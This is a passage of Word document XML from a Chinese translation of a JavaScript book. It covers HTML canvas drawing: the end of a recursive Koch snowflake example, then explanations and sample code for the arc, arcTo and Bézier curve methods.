    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.restore();//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复初始的变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>级别的科赫雪花的一条边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此函数在画完一条边的时候就离开当前点，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后通过坐标系变换将当前点又转换成</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0,)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这意味着画完一条边之后可以很简单地调用</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>进行旋转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function leg(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.save();//</w:t>
      </w:r>
      <w:r>
        <w:t>保存当前坐标系变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n==0){//</w:t>
      </w:r>
      <w:r>
        <w:t>不需要递归的情况下</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(len,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>就绘制一条水平线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>递归情况下：绘制</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>条子边，类似这</w:t>
      </w:r>
      <w:r>
        <w:t>个样子：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>\/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.scale(1/3,1/3);//</w:t>
      </w:r>
      <w:r>
        <w:t>子边长度为原边长的</w:t>
      </w:r>
      <w:r>
        <w:t>1/3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>递归第一条子边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.rotate(60*deg);//</w:t>
      </w:r>
      <w:r>
        <w:t>顺时针旋转</w:t>
      </w:r>
      <w:r>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>第二条子边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.rotate(-120*deg);//</w:t>
      </w:r>
      <w:r>
        <w:t>逆时针旋转</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>第三条子边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.rotate(60*deg);//</w:t>
      </w:r>
      <w:r>
        <w:t>通过旋转回到初始状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>leg(n-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>最后一条边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.restore();//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复坐标系变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.translate(len,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>但是通过转换使得边的结</w:t>
      </w:r>
      <w:r>
        <w:t>束点为</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>snowflake(c,0,5,115,125);//0</w:t>
      </w:r>
      <w:r>
        <w:t>级别的雪花就是一个三角形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>snowflake(c,1,145,115,125);//1</w:t>
      </w:r>
      <w:r>
        <w:t>级别的雪花就是一个六角星</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>snowflake(c,2,285,115,125);//</w:t>
      </w:r>
      <w:r>
        <w:t>依次类推</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>snowflake(c,3,425,115,125);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>snowflake(c,4,565,115,125);//4</w:t>
      </w:r>
      <w:r>
        <w:t>级别的雪花看起来真的像一朵雪花了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>勾勒当前复杂的路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="535" w:name="21_4_5_Hui_Zhi_He_Tian_Chong_Qu_Xian_"/>
      <w:r>
        <w:t>21.4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　绘制和填充曲线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>路径由子路径组成，子路径又由连接的点组成。在</w:t>
      </w:r>
      <w:r>
        <w:t>2 1.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中定义的路径中，那些点是通过直线段来连接的，但点与点之间并不总是通过直线段连接的。</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了一些方法，这些方法用于在子路径中添加新的点，并用曲线将当前点和新增的点连接起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>arc()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此方法实现在当前子路径中添加一条弧。它首先将当前点和弧形的起点用一条直线连接，然后用圆的一部分来连接弧形的起点和终点，并把弧形终点作为新的当前点。要绘制一个弧形需要指定</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个参数：圆心的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标、圆的半径、弧形的起始和</w:t>
      </w:r>
      <w:r>
        <w:t>结束的角度以及弧形的方向（顺时针还是逆时针）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arcTo()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此方法绘制一条直线和一段圆弧（和</w:t>
      </w:r>
      <w:r>
        <w:t>arc()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样），但是，不同的是，绘制圆弧的时候指定的参数不同。</w:t>
      </w:r>
      <w:r>
        <w:t>arc()</w:t>
      </w:r>
      <w:r>
        <w:t>方法参数需要指定点</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>P2</w:t>
      </w:r>
      <w:r>
        <w:t>以及半径。绘制的圆弧有指定的半径并且和当前点到</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>的直线以及经过</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>P2</w:t>
      </w:r>
      <w:r>
        <w:t>的直线都相切。此种绘制圆弧的方法看似有点儿奇怪，但是对于绘制带有圆角的形状是非常有用的。当指定的半径为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>时，此方法只会绘制一条从当前点到</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>的直线。而当半径值非零时，此方法会绘制一条从当前点到</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>的直线，然后将这条直线按照圆形形状变成曲</w:t>
      </w:r>
      <w:r>
        <w:t>线，一直到它指向</w:t>
      </w:r>
      <w:r>
        <w:t>P2</w:t>
      </w:r>
      <w:r>
        <w:t>方向。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bezierCurveTo()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此方法实现在当前子路径中添加一个新的点，并利用三次贝赛尔曲线将它和当前点相连。曲线的形状由两个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>控制点</w:t>
      </w:r>
      <w:r>
        <w:t>”C1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>C2</w:t>
      </w:r>
      <w:r>
        <w:t>确</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定。曲线从当前点开始，沿着</w:t>
      </w:r>
      <w:r>
        <w:t>C1</w:t>
      </w:r>
      <w:r>
        <w:t>点的方向延伸，再沿着</w:t>
      </w:r>
      <w:r>
        <w:t>C2</w:t>
      </w:r>
      <w:r>
        <w:t>的方向延伸一直到点</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>。曲线在这些点之间的过渡都是很平滑的。最后点</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>会成为当前点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>quadraticCurveTo()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此方法和</w:t>
      </w:r>
      <w:r>
        <w:t>bezierCurveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似，不同的是它使用的是二次贝塞尔曲线而不是三次贝塞尔曲线并且只有一个控制点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用这些方法来绘制出如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-9</w:t>
      </w:r>
      <w:r>
        <w:t>所示的图形：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4058728" cy="2083279"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="71" name="00071.jpeg" descr="000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1.jpeg" descr="00071.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058728" cy="2083279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　画布中的曲线路径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示了用于绘制图</w:t>
      </w:r>
      <w:r>
        <w:t>21-9</w:t>
      </w:r>
      <w:r>
        <w:t>所示图形的代码。代码中展示的一些方法是画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中比较复杂的方法的一部分。想要了解这些复杂方法的细节以及它们的参数可以参见第四部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>：在路径中添加曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个工具函数，用于将角度从角度制转化成弧度制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function rads(x){return Math.PI*x/180;}//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个圆形，如果需要椭圆的话则进行相应的缩放和旋转即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>由于没有当前点，因此绘制的圆</w:t>
      </w:r>
      <w:r>
        <w:t>形不需要当前点到圆形起点之间的直线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.beginPath();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arc(75,100,50,//</w:t>
      </w:r>
      <w:r>
        <w:t>圆心位于</w:t>
      </w:r>
      <w:r>
        <w:t>(75,100)</w:t>
      </w:r>
      <w:r>
        <w:t>，半径为</w:t>
      </w:r>
      <w:r>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0,rads(360),false);//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>顺时针旋转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个楔，角度从</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>轴正向顺时针度量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是</w:t>
      </w:r>
      <w:r>
        <w:t>arc()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会将当前点和弧形起点用直线相连</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(200,100);//</w:t>
      </w:r>
      <w:r>
        <w:t>从圆心开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arc(200,100,50,//</w:t>
      </w:r>
      <w:r>
        <w:t>圆心和半径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>rads(-60),rads(0),//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>-60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>开始一直到</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false);//false</w:t>
      </w:r>
      <w:r>
        <w:t>表示顺时针</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>将半径添加到圆心</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同样的楔，但是方向不同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(325,100);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arc(325,100,50,rads(-60),rads(0),true);//</w:t>
      </w:r>
      <w:r>
        <w:t>逆时针</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>arcTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来绘制圆角，绘制一个以点</w:t>
      </w:r>
      <w:r>
        <w:t>(400,50)</w:t>
      </w:r>
      <w:r>
        <w:t>为左上角同时还带有不同半径角的正方形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(450,50);//</w:t>
      </w:r>
      <w:r>
        <w:t>从上边的中点开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(500,50,500,150,30);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加部分上边和右</w:t>
      </w:r>
      <w:r>
        <w:t>上角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(500,150,400,150,20);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加右上角和右下角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(400,150,400,50,10);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加底边和左下角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(400,50,500,50,0)//</w:t>
      </w:r>
      <w:r>
        <w:t>添加左边和左上角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>闭合路径来添加其余的上边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>二次贝塞尔曲线：一个控制点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(75,250);//</w:t>
      </w:r>
      <w:r>
        <w:t>从点</w:t>
